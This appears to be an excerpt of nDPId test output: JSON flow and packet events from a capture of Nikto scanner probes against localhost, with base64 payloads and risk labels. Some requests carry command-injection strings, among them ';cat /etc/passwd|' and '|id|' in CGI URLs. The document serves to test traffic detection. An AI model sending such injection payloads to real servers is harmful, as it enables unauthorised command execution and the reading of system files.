{"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/cgi-bin\/handler","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001069)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":535,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":535,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277536,"flow_last_seen":1576420277536,"flow_idle_time":7560000,"flow_min_l4_payload_len":184,"flow_max_l4_payload_len":184,"flow_tot_l4_payload_len":184,"flow_avg_l4_payload_len":184,"midstream":1,"thread_ts_msec":1576420277536,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50632,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00726{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":535,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":535,"flow_packet_id":1,"flow_last_seen":1576420277536,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":250,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":250,"pkt_l4_len":216,"thread_ts_msec":1576420277536,"pkt":"AAAAAAAAAAAAAAAACABFAADsKwtAAEAGEP9\/AAABfwAAAcXIH5DuMhPiKIF7BYAYAED+4AAAAQEICp1m\/kidZv5IR0VUIC9jZ2ktYmluL2hhbmRsZXIvbmV0c29uYXI7Y2F0IC9ldGMvcGFzc3dkfD9kYXRhPURvd25sb2FkIEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMDcwKQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} +01105{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":535,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":535,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277536,"flow_last_seen":1576420277536,"flow_idle_time":7560000,"flow_min_l4_payload_len":184,"flow_max_l4_payload_len":184,"flow_tot_l4_payload_len":184,"flow_avg_l4_payload_len":184,"midstream":1,"thread_ts_msec":1576420277536,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50632,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/cgi-bin\/handler\/netsonar;cat \/etc\/passwd|?data=Download","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001070)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":536,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":536,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277537,"flow_last_seen":1576420277537,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277537,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50634,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":536,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":536,"flow_packet_id":1,"flow_last_seen":1576420277537,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277537,"pkt":"AAAAAAAAAAAAAAAACABFAADIaaFAAEAG0ox\/AAABfwAAAcXKH5CUxlF4c7zrSYAYAED+vAAAAQEICp1m\/kmdZv5JR0VUIC9jZ2ktYmluL3dlYmRpc3QuY2dpIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEwNzEpDQoNCg=="} +01066{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":536,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":536,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277537,"flow_last_seen":1576420277537,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277537,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50634,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/cgi-bin\/webdist.cgi","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001071)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":537,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":537,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277538,"flow_last_seen":1576420277538,"flow_idle_time":7560000,"flow_min_l4_payload_len":151,"flow_max_l4_payload_len":151,"flow_tot_l4_payload_len":151,"flow_avg_l4_payload_len":151,"midstream":1,"thread_ts_msec":1576420277538,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50636,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00682{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":537,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":537,"flow_packet_id":1,"flow_last_seen":1576420277538,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":217,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":217,"pkt_l4_len":183,"thread_ts_msec":1576420277538,"pkt":"AAAAAAAAAAAAAAAACABFAADL1l9AAEAGZct\/AAABfwAAAcXMH5AhiO62DmMqh4AYAED+vwAAAQEICp1m\/kqdZv5KR0VUIC9EQjRXZWIvMTAuMTAuMTAuMTA6MTAwIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEwNzIpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} +01069{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":537,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":537,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277538,"flow_last_seen":1576420277538,"flow_idle_time":7560000,"flow_min_l4_payload_len":151,"flow_max_l4_payload_len":151,"flow_tot_l4_payload_len":151,"flow_avg_l4_payload_len":151,"midstream":1,"thread_ts_msec":1576420277538,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50636,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/DB4Web\/10.10.10.10:100","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001072)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":538,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":538,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277540,"flow_last_seen":1576420277540,"flow_idle_time":7560000,"flow_min_l4_payload_len":155,"flow_max_l4_payload_len":155,"flow_tot_l4_payload_len":155,"flow_avg_l4_payload_len":155,"midstream":1,"thread_ts_msec":1576420277540,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50638,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00687{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":538,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":538,"flow_packet_id":1,"flow_last_seen":1576420277540,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":221,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":221,"pkt_l4_len":187,"thread_ts_msec":1576420277540,"pkt":"AAAAAAAAAAAAAAAACABFAADPftlAAEAGvU1\/AAABfwAAAcXOH5DRSkY\/0jWbSIAYAED+wwAAAQEICp1m\/kydZv5MR0VUIC9ld3MvZXdzL2FyY2hpdGV4dF9xdWVyeS5wbCBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMDczKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KDQo="} +01074{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":538,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":538,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277540,"flow_last_seen":1576420277540,"flow_idle_time":7560000,"flow_min_l4_payload_len":155,"flow_max_l4_payload_len":155,"flow_tot_l4_payload_len":155,"flow_avg_l4_payload_len":155,"midstream":1,"thread_ts_msec":1576420277540,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50638,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/ews\/ews\/architext_query.pl","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001073)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":539,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":539,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277543,"flow_last_seen":1576420277543,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277543,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50640,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":539,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":539,"flow_packet_id":1,"flow_last_seen":1576420277543,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277543,"pkt":"AAAAAAAAAAAAAAAACABFAADI031AAEAGaLB\/AAABfwAAAcXQH5AqpOuTqUte6oAYAED+vAAAAQEICp1m\/k+dZv5OR0VUIC9leGVjL3Nob3cvY29uZmlnL2NyIEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMDc0KQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} +01068{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":539,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":539,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277543,"flow_last_seen":1576420277543,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277543,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50640,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/exec\/show\/config\/cr","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001074)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":540,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":540,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277544,"flow_last_seen":1576420277544,"flow_idle_time":7560000,"flow_min_l4_payload_len":155,"flow_max_l4_payload_len":155,"flow_tot_l4_payload_len":155,"flow_avg_l4_payload_len":155,"midstream":1,"thread_ts_msec":1576420277544,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50642,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00686{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":540,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":540,"flow_packet_id":1,"flow_last_seen":1576420277544,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":221,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":221,"pkt_l4_len":187,"thread_ts_msec":1576420277544,"pkt":"AAAAAAAAAAAAAAAACABFAADPHndAAEAGHbB\/AAABfwAAAcXSH5BxSyag9dSEBYAYAED+wwAAAQEICp1m\/lCdZv5QR0VUIC9pbnN0YW50d2VibWFpbC9tZXNzYWdlLnBocCBIVFRQLzEuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwMTA3NSkNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} +01073{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":540,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":540,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277544,"flow_last_seen":1576420277544,"flow_idle_time":7560000,"flow_min_l4_payload_len":155,"flow_max_l4_payload_len":155,"flow_tot_l4_payload_len":155,"flow_avg_l4_payload_len":155,"midstream":1,"thread_ts_msec":1576420277544,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50642,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/instantwebmail\/message.php","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001075)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":541,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":541,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277546,"flow_last_seen":1576420277546,"flow_idle_time":7560000,"flow_min_l4_payload_len":165,"flow_max_l4_payload_len":165,"flow_tot_l4_payload_len":165,"flow_avg_l4_payload_len":165,"midstream":1,"thread_ts_msec":1576420277546,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50644,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00698{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":541,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":541,"flow_packet_id":1,"flow_last_seen":1576420277546,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":231,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":231,"pkt_l4_len":197,"thread_ts_msec":1576420277546,"pkt":"AAAAAAAAAAAAAAAACABFAADZI0FAAEAGGNx\/AAABfwAAAcXUH5D0qBvWdLImZ4AYAED+zQAAAQEICp1m\/lGdZv5RR0VUIC9jZmRvY3Mvc25pcHBldHMvZ2V0dGVtcGRpcmVjdG9yeS5jZm0gSFRUUC8xLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEwNzYpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpIb3N0OiAxMjcuMC4wLjENCg0K"} +01084{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":541,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":541,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277546,"flow_last_seen":1576420277546,"flow_idle_time":7560000,"flow_min_l4_payload_len":165,"flow_max_l4_payload_len":165,"flow_tot_l4_payload_len":165,"flow_avg_l4_payload_len":165,"midstream":1,"thread_ts_msec":1576420277546,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50644,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/cfdocs\/snippets\/gettempdirectory.cfm","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001076)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":542,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":542,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277547,"flow_last_seen":1576420277547,"flow_idle_time":7560000,"flow_min_l4_payload_len":159,"flow_max_l4_payload_len":159,"flow_tot_l4_payload_len":159,"flow_avg_l4_payload_len":159,"midstream":1,"thread_ts_msec":1576420277547,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50646,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00690{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":542,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":542,"flow_packet_id":1,"flow_last_seen":1576420277547,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":225,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":225,"pkt_l4_len":191,"thread_ts_msec":1576420277547,"pkt":"AAAAAAAAAAAAAAAACABFAADT6e9AAEAGUjN\/AAABfwAAAcXWH5DaBdEHtMEbgIAYAED+xwAAAQEICp1m\/lOdZv5TR0VUIC9kb3N0dWZmLnBocD9hY3Rpb249bW9kaWZ5X3VzZXIgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwMTA5MSkNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCg0K"} +01076{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":542,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":542,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277547,"flow_last_seen":1576420277547,"flow_idle_time":7560000,"flow_min_l4_payload_len":159,"flow_max_l4_payload_len":159,"flow_tot_l4_payload_len":159,"flow_avg_l4_payload_len":159,"midstream":1,"thread_ts_msec":1576420277547,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50646,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/dostuff.php?action=modify_user","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001091)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":543,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":543,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277549,"flow_last_seen":1576420277549,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277549,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50648,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":543,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":543,"flow_packet_id":1,"flow_last_seen":1576420277549,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277549,"pkt":"AAAAAAAAAAAAAAAACABFAADIKVFAAEAGEt1\/AAABfwAAAcXYH5AE3RGlWDKVx4AYAED+vAAAAQEICp1m\/lWdZv5VR0VUIC9sb2dqYW0vc2hvd2hpdHMucGhwIEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMTU3KQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} +01066{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":543,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":543,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277549,"flow_last_seen":1576420277549,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277549,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50648,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/logjam\/showhits.php","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001157)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":544,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":544,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277550,"flow_last_seen":1576420277550,"flow_idle_time":7560000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":1,"thread_ts_msec":1576420277550,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50650,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00668{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":544,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":544,"flow_packet_id":1,"flow_last_seen":1576420277550,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":205,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":205,"pkt_l4_len":171,"thread_ts_msec":1576420277550,"pkt":"AAAAAAAAAAAAAAAACABFAAC\/wwtAAEAGeSt\/AAABfwAAAcXaH5CLi\/vjqeJa6IAYAED+swAAAQEICp1m\/ladZv5WR0VUIC9tYW51YWwucGhwIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDExNTgpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} +01056{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":544,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":544,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277550,"flow_last_seen":1576420277550,"flow_idle_time":7560000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":1,"thread_ts_msec":1576420277550,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50650,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/manual.php","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001158)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":545,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":545,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277552,"flow_last_seen":1576420277552,"flow_idle_time":7560000,"flow_min_l4_payload_len":165,"flow_max_l4_payload_len":165,"flow_tot_l4_payload_len":165,"flow_avg_l4_payload_len":165,"midstream":1,"thread_ts_msec":1576420277552,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50652,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00698{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":545,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":545,"flow_packet_id":1,"flow_last_seen":1576420277552,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":231,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":231,"pkt_l4_len":197,"thread_ts_msec":1576420277552,"pkt":"AAAAAAAAAAAAAAAACABFAADZ8pVAAEAGSYd\/AAABfwAAAcXcH5AUWcqAeMmTFYAYAED+zQAAAQEICp1m\/lidZv5YR0VUIC9tb2RzL2FwYWdlL2FwYWdlLmNnaT9mPWZpbGUuaHRtLnxpZHwgSFRUUC8xLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDExNTkpDQpIb3N0OiAxMjcuMC4wLjENCg0K"} 